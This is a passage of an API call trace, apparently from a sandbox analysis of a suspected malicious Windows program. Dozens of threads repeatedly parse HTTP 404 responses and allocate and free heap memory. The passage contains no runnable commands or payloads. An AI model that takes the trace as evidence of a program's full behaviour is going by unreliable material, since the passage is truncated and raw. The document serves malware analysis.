0xf8c Thread: id = 10 os_tid = 0x508 [0151.223] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0151.223] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0151.223] GetProcessHeap () returned 0x690000 [0151.223] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea60 [0151.223] GetProcessHeap () returned 0x690000 [0151.223] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea60 | out: hHeap=0x690000) returned 1 [0151.223] GetProcessHeap () returned 0x690000 [0151.224] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4fc8 | out: hHeap=0x690000) returned 1 Thread: id = 11 os_tid = 0xfdc [0161.591] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0161.591] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0161.591] GetProcessHeap () returned 0x690000 [0161.591] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea60 [0161.591] GetProcessHeap () returned 0x690000 [0161.591] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea60 | out: hHeap=0x690000) returned 1 [0161.591] GetProcessHeap () returned 0x690000 [0161.592] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4fc8 | out: hHeap=0x690000) returned 1 Thread: id = 12 os_tid = 0xc7c [0172.237] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.237] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:37 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0172.238] GetProcessHeap () returned 0x690000 [0172.238] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea60 [0172.238] GetProcessHeap () returned 0x690000 [0172.238] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea60 | out: hHeap=0x690000) returned 1 [0172.238] GetProcessHeap () returned 0x690000 [0172.238] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4fc8 | out: hHeap=0x690000) returned 1 Thread: id = 13 os_tid = 0x1354 [0172.466] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.466] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:37 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0172.466] GetProcessHeap () returned 0x690000 [0172.466] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea60 [0172.466] GetProcessHeap () returned 0x690000 [0172.466] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea60 | out: hHeap=0x690000) returned 1 [0172.466] GetProcessHeap () returned 0x690000 [0172.467] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4fc8 | out: hHeap=0x690000) returned 1 Thread: id = 14 os_tid = 0x1024 [0172.865] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.865] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:37 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0172.865] GetProcessHeap () returned 0x690000 [0172.865] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea60 [0172.865] GetProcessHeap () returned 0x690000 [0172.865] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea60 | out: hHeap=0x690000) returned 1 [0172.866] GetProcessHeap () returned 0x690000 [0172.867] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4fc8 | out: hHeap=0x690000) returned 1 Thread: id = 15 os_tid = 0x1350 [0173.095] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.096] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:38 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0173.096] GetProcessHeap () returned 0x690000 [0173.096] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea60 [0173.096] GetProcessHeap () returned 0x690000 [0173.096] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea60 | out: hHeap=0x690000) returned 1 [0173.096] GetProcessHeap () returned 0x690000 [0173.096] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4fc8 | out: hHeap=0x690000) returned 1 Thread: id = 16 os_tid = 0x1374 [0173.355] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.356] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:38 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0173.356] GetProcessHeap () returned 0x690000 [0173.356] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea60 [0173.356] GetProcessHeap () returned 0x690000 [0173.356] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea60 | out: hHeap=0x690000) returned 1 [0173.356] GetProcessHeap () returned 0x690000 [0173.356] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4fc8 | out: hHeap=0x690000) returned 1 Thread: id = 17 os_tid = 0xca4 [0173.602] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.602] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:38 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0173.602] GetProcessHeap () returned 0x690000 [0173.602] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea60 [0173.602] GetProcessHeap () returned 0x690000 [0173.602] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea60 | out: hHeap=0x690000) returned 1 [0173.602] GetProcessHeap () returned 0x690000 [0173.603] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4fc8 | out: hHeap=0x690000) returned 1 Thread: id = 18 os_tid = 0x1030 [0173.882] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.906] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:39 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0173.906] GetProcessHeap () returned 0x690000 [0173.906] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea60 [0173.906] GetProcessHeap () returned 0x690000 [0173.906] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea60 | out: hHeap=0x690000) returned 1 [0173.906] GetProcessHeap () returned 0x690000 [0173.906] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4fc8 | out: hHeap=0x690000) returned 1 Thread: id = 19 os_tid = 0x718 [0174.240] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0174.240] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:39 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0174.240] GetProcessHeap () returned 0x690000 [0174.240] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea60 [0174.240] GetProcessHeap () returned 0x690000 [0174.240] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea60 | out: hHeap=0x690000) returned 1 [0174.240] GetProcessHeap () returned 0x690000 [0174.241] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4fc8 | out: hHeap=0x690000) returned 1 Thread: id = 20 os_tid = 0x6d0 [0174.372] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0174.373] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:39 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0174.373] GetProcessHeap () returned 0x690000 [0174.373] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea60 [0174.373] GetProcessHeap () returned 0x690000 [0174.373] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea60 | out: hHeap=0x690000) returned 1 [0174.373] GetProcessHeap () returned 0x690000 [0174.373] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4fc8 | out: hHeap=0x690000) returned 1 Thread: id = 21 os_tid = 0xefc [0175.233] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0175.234] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:39 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0175.234] GetProcessHeap () returned 0x690000 [0175.234] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea60 [0175.234] GetProcessHeap () returned 0x690000 [0175.234] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea60 | out: hHeap=0x690000) returned 1 [0175.234] GetProcessHeap () returned 0x690000 [0175.235] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4fc8 | out: hHeap=0x690000) returned 1 Thread: id = 22 os_tid = 0x77c [0175.859] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0175.891] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:41 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0175.891] GetProcessHeap () returned 0x690000 [0175.891] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea60 [0175.891] GetProcessHeap () returned 0x690000 [0175.891] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea60 | out: hHeap=0x690000) returned 1 [0175.892] GetProcessHeap () returned 0x690000 [0175.892] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4fc8 | out: hHeap=0x690000) returned 1 Thread: id = 23 os_tid = 0xff4 [0176.110] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.111] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:41 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0176.111] GetProcessHeap () returned 0x690000 [0176.111] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea60 [0176.111] GetProcessHeap () returned 0x690000 [0176.111] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea60 | out: hHeap=0x690000) returned 1 [0176.111] GetProcessHeap () returned 0x690000 [0176.111] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4fc8 | out: hHeap=0x690000) returned 1 Thread: id = 24 os_tid = 0x4ac [0176.339] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.339] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:41 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0176.339] GetProcessHeap () returned 0x690000 [0176.339] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea60 [0176.339] GetProcessHeap () returned 0x690000 [0176.339] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea60 | out: hHeap=0x690000) returned 1 [0176.339] GetProcessHeap () returned 0x690000 [0176.340] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4fc8 | out: hHeap=0x690000) returned 1 Thread: id = 25 os_tid = 0x1330 Thread: id = 26 os_tid = 0x414 Thread: id = 27 os_tid = 0xb70 [0176.600] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.601] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:41 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0176.601] GetProcessHeap () returned 0x690000 [0176.601] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea60 [0176.601] GetProcessHeap () returned 0x690000 [0176.601] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea60 | out: hHeap=0x690000) returned 1 [0176.601] GetProcessHeap () returned 0x690000 [0176.602] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad790 | out: hHeap=0x690000) returned 1 Thread: id = 28 os_tid = 0x898 [0176.824] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.825] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:42 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0176.825] GetProcessHeap () returned 0x690000 [0176.825] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea60 [0176.825] GetProcessHeap () returned 0x690000 [0176.825] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea60 | out: hHeap=0x690000) returned 1 [0176.825] GetProcessHeap () returned 0x690000 [0176.826] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad790 | out: hHeap=0x690000) returned 1 Thread: id = 29 os_tid = 0x8f0 [0177.015] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.016] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:42 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0177.016] GetProcessHeap () returned 0x690000 [0177.016] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea60 [0177.016] GetProcessHeap () returned 0x690000 [0177.016] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea60 | out: hHeap=0x690000) returned 1 [0177.016] GetProcessHeap () returned 0x690000 [0177.016] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad790 | out: hHeap=0x690000) returned 1 Thread: id = 30 os_tid = 0xb60 [0177.170] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.171] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:42 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0177.171] GetProcessHeap () returned 0x690000 [0177.171] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea60 [0177.171] GetProcessHeap () returned 0x690000 [0177.171] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea60 | out: hHeap=0x690000) returned 1 [0177.171] GetProcessHeap () returned 0x690000 [0177.171] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad790 | out: hHeap=0x690000) returned 1 Thread: id = 31 os_tid = 0x8c0 [0177.412] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.415] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:42 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0177.415] GetProcessHeap () returned 0x690000 [0177.415] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0177.415] GetProcessHeap () returned 0x690000 [0177.415] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0177.415] GetProcessHeap () returned 0x690000 [0177.415] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad790 | out: hHeap=0x690000) returned 1 Thread: id = 32 os_tid = 0x920 [0177.926] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.926] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:43 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0177.926] GetProcessHeap () returned 0x690000 [0177.926] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae910 [0177.926] GetProcessHeap () returned 0x690000 [0177.926] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae910 | out: hHeap=0x690000) returned 1 [0177.926] GetProcessHeap () returned 0x690000 [0177.927] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad790 | out: hHeap=0x690000) returned 1 Thread: id = 33 os_tid = 0x4a8 [0178.121] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.136] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:43 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0178.136] GetProcessHeap () returned 0x690000 [0178.136] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeac0 [0178.136] GetProcessHeap () returned 0x690000 [0178.136] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeac0 | out: hHeap=0x690000) returned 1 [0178.136] GetProcessHeap () returned 0x690000 [0178.137] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad790 | out: hHeap=0x690000) returned 1 Thread: id = 34 os_tid = 0x1394 [0178.476] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.477] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:43 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0178.477] GetProcessHeap () returned 0x690000 [0178.477] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeac0 [0178.477] GetProcessHeap () returned 0x690000 [0178.477] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeac0 | out: hHeap=0x690000) returned 1 [0178.477] GetProcessHeap () returned 0x690000 [0178.478] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad790 | out: hHeap=0x690000) returned 1 Thread: id = 35 os_tid = 0x5d0 [0178.837] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.837] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:43 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0178.837] GetProcessHeap () returned 0x690000 [0178.837] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeac0 [0178.837] GetProcessHeap () returned 0x690000 [0178.837] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeac0 | out: hHeap=0x690000) returned 1 [0178.837] GetProcessHeap () returned 0x690000 [0178.838] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af418 | out: hHeap=0x690000) returned 1 Thread: id = 36 os_tid = 0xd7c [0179.031] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.032] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0179.032] GetProcessHeap () returned 0x690000 [0179.032] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeac0 [0179.032] GetProcessHeap () returned 0x690000 [0179.032] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeac0 | out: hHeap=0x690000) returned 1 [0179.032] GetProcessHeap () returned 0x690000 [0179.032] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af418 | out: hHeap=0x690000) returned 1 Thread: id = 37 os_tid = 0x8fc [0179.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.228] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0179.228] GetProcessHeap () returned 0x690000 [0179.228] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeac0 [0179.228] GetProcessHeap () returned 0x690000 [0179.228] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeac0 | out: hHeap=0x690000) returned 1 [0179.228] GetProcessHeap () returned 0x690000 [0179.229] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af418 | out: hHeap=0x690000) returned 1 Thread: id = 38 os_tid = 0x300 [0179.423] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.424] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0179.424] GetProcessHeap () returned 0x690000 [0179.424] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeac0 [0179.424] GetProcessHeap () returned 0x690000 [0179.424] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeac0 | out: hHeap=0x690000) returned 1 [0179.424] GetProcessHeap () returned 0x690000 [0179.424] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af418 | out: hHeap=0x690000) returned 1 Thread: id = 39 os_tid = 0xecc [0179.622] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.622] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0179.622] GetProcessHeap () returned 0x690000 [0179.622] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae8c8 [0179.622] GetProcessHeap () returned 0x690000 [0179.622] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae8c8 | out: hHeap=0x690000) returned 1 [0179.622] GetProcessHeap () returned 0x690000 [0179.623] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af418 | out: hHeap=0x690000) returned 1 Thread: id = 40 os_tid = 0xe08 [0179.878] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.878] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:45 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0179.878] GetProcessHeap () returned 0x690000 [0179.878] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae8c8 [0179.878] GetProcessHeap () returned 0x690000 [0179.878] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae8c8 | out: hHeap=0x690000) returned 1 [0179.878] GetProcessHeap () returned 0x690000 [0179.879] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af418 | out: hHeap=0x690000) returned 1 Thread: id = 41 os_tid = 0xf44 [0180.099] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.099] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:45 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0180.099] GetProcessHeap () returned 0x690000 [0180.099] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb08 [0180.099] GetProcessHeap () returned 0x690000 [0180.099] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb08 | out: hHeap=0x690000) returned 1 [0180.099] GetProcessHeap () returned 0x690000 [0180.100] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af418 | out: hHeap=0x690000) returned 1 Thread: id = 42 os_tid = 0xaa4 [0180.294] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.294] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:45 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0180.295] GetProcessHeap () returned 0x690000 [0180.295] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb08 [0180.295] GetProcessHeap () returned 0x690000 [0180.295] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb08 | out: hHeap=0x690000) returned 1 [0180.295] GetProcessHeap () returned 0x690000 [0180.295] HeapFree (in: hHeap=0x690000, 